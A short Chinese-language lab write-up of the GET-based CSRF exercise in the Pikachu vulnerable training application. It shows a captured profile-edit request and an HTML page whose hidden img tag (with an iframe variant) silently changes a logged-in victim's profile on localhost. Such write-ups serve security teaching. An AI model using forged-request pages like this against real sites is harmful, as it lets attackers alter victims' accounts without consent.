CSRF(get) login
用kobe/123456登录后,来到修改个人信息页面
submit后抓包
发现他是用get请求发起的,那我们就可以构造一个链接让受害者来点击(受害者账号是登录状态),以达到修改他信息的目的
例如:构造一个html诱使受害者点击后,就会改变他的性别为hack
<html>
<head>
<title>
test
</title>
</head>
<body>
<!-- <iframe src="http://localhost//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=hack&phonenum=15988767673&add=nba+lakes&email=kobe%40pikachu.com&submit=submit" frameborder="0" width="0" heigth="0"/> -->
<img src="http://localhost//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=hack&phonenum=15988767673&add=nba+lakes&email=kobe%40pikachu.com&submit=submit"/>
</body>
</html>
也可以把链接放到iframe标签里,我这里是放到了img标签
实验:
一开始性别是boy
打开上面写好的test.html
再刷新用户信息页面
我的本地测试因为Chrome的安全策略并没有成功,
我是直接打开源码点击链接实验的